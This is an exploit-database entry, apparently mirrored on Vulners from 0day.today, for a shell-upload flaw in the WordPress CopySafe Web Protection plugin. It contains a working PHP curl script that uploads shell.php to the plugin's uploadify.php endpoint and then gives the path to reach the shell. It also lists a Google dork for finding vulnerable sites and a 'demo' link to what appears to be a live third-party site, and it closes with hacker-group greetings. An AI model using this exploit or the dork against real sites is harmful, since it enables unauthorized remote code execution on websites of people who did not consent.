Lucene search
K

Wordpress Plugin CopySafe Web Protection Shell Upload (0day) Vulnerability

🗓️ 03 Jun 2014 00:00:00Reported by AloulouType 
zdt
 zdt
🔗 0day.today👁 23 Views

WordPress Plugin CopySafe Web Protection Shell Upload Vulnerabilit

Code
############################################################################

# Title : Wordpress Plugin CopySafe Web Protection Shell Upload Vulnerability    

# Author : Aloulou                                              

# Date : 01/06/2014                                                     

# Facebook : http://www.facebook.com/Aloulou.TN                                

# Email: [email protected]

# Vendor : wordpress.org                                                      

# Google Dork : inurl:wp-content/plugins/wp-copysafe-web  

# Tested on : Linux 
                       


############################################################################

NOTE:showing output "0" means the shell is successfully uplaoded with "0" errors!

Exploit: 

<?php
$uploadfile="shell.php";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/wp-copysafe-web/lib/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('wpcsw_file'=>"@$uploadfile",'error'=>'-1'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

"0"---->successful

ShellAccess:

    http://127.0.0.1/wp-content/plugins/wp-copysafe-web/lib/uploadify/shell.php

Demo:http://extraordinaryviews.de

# Greeting to : Tunisia ,  CyberPink , AnonBoy and All muslims 


############################################################################

#  0day.today [2018-04-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation